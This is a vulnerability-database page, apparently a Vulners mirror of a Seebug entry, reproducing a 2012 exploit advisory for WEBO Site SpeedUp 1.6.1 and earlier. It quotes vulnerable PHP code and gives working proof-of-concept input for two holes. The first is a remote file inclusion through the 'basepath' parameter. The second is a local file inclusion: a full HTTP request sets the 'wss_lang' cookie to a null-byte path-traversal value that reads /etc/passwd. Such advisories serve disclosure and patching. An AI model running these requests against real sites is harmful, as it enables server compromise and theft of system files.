Lucene search
K

webo site speedup <= 1.6.1 - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 14 Views

WEBO Site SpeedUp <= 1.6.1 Multiple Vulnerabilities Discovere

Code

                                                  :::::::-.   ...    ::::::.    :::.
   ;;,   `&#39;;, ;;     ;;;`;;;;,  `;;;
   `[[     [[[[&#39;     [[[  [[[[[. &#39;[[
    $$,    $$$$      $$$  $$$ &#34;Y$c$$
    888_,o8P&#39;88    .d888  888    Y88
    MMMMP&#34;`   &#34;YmmMMMM&#34;&#34;  MMM     YM
	
   [ Discovered by dun \ posdub[at]gmail.com ]
   [ 2012-06-16                              ]
 ###############################################################
 #  [ WEBO Site SpeedUp &#60;= 1.6.1 ]  Multiple Vulnerabilites    #
 ###############################################################
 #
 # Script: &#34;WEBO Site SpeedUp is a PHP solution that automatically speeds your 
 #          website up by combining and compressing your JavaScript and CSS assets...&#34;
 #
 # Vendor:   http://www.webogroup.com/home/
 # Download: http://web-optimizator.googlecode.com/files/webo.site.speedup.v1.6.1.zip
 #
 #  Bug: ./weboptimizer/index.php (lines: 7-21)
 #  ...
 #  $basepath = isset($basepath) ? $basepath : dirname(__FILE__) . &#39;/&#39;;          // 1 [RFI]
 # 
 #  /* We need these */
 #  require($basepath . &#34;controller/admin.php&#34;);                                 // 2 [RFI]
 #  require($basepath . &#34;libs/php/view.php&#34;);
 # 
 #  /* include language file */
 #  $language = strtolower(preg_replace(&#34;/[-,;].*/&#34;, &#34;&#34;, empty($_SERVER[&#34;HTTP_ACCEPT_LANGUAGE&#34;]) ? &#39;en&#39; : $_SERVER[&#34;HTTP_ACCEPT_LANGUAGE&#34;]));
 #  $language = preg_replace(&#34;/[^a-z]/&#34;, &#34;&#34;, $language);
 #  $language = str_replace(array(&#39;uk&#39;), array(&#39;ua&#39;), $language);
 #  if (!empty($_COOKIE[&#39;wss_lang&#39;])) {                                          // 1 [LFI]
 #    $language = strtolower($_COOKIE[&#39;wss_lang&#39;]);                              // 2 [LFI]
 #  }
 #  if (is_file($basepath . &#34;libs/php/lang/&#34; . $language . &#34;.php&#34;)) {            //
 #    require($basepath . &#34;libs/php/lang/&#34; . $language . &#34;.php&#34;);                // 3 [LFI]
 #  } else {
 #  	require($basepath . &#34;libs/php/lang/en.php&#34;);
 #  }
 #  ...

   [RFI] Vuln: ( allow_url_include = On; register_globals = On; )

         http://localhost/weboptimizer/index.php?basepath=http://localhost/phpinfo.txt?

   [LFI] Vuln: ( magic_quotes_gpc = Off; )
 
         GET /weboptimizer/ HTTP/1.1
         Host: localhost
         User-Agent: Mozilla/5.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
         Accept-Language: pl,en-us;q=0.7,en;q=0.3
         Accept-Encoding: gzip, deflate
         Connection: keep-alive
         Referer: http://localhost/weboptimizer/
         Cookie: wss_blocks=wss_toolswss_linkswss_newswss_syswss_updates; wss_lang=../../../../../../etc/passwd%00
  
         HTTP/1.1 200 OK
         Server: Apache
         Date: Fri, 14 Jun 2012 22:29:39 GMT
         Content-Type: text/html;charset=utf-8
         Connection: keep-alive
         X-Powered-By: PHP/5.2.10
         Expires: Sat, 16 Jun 2012 03:29:39 +0400
         Cache-Control: no-store, no-cache, must-revalidate, private
         Pragma: no-cache
         Vary: Accept-Encoding,User-Agent
         Content-Encoding: gzip
         Content-Length: 2099
   
 ### [ dun / 2012 ] #####################################################
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
14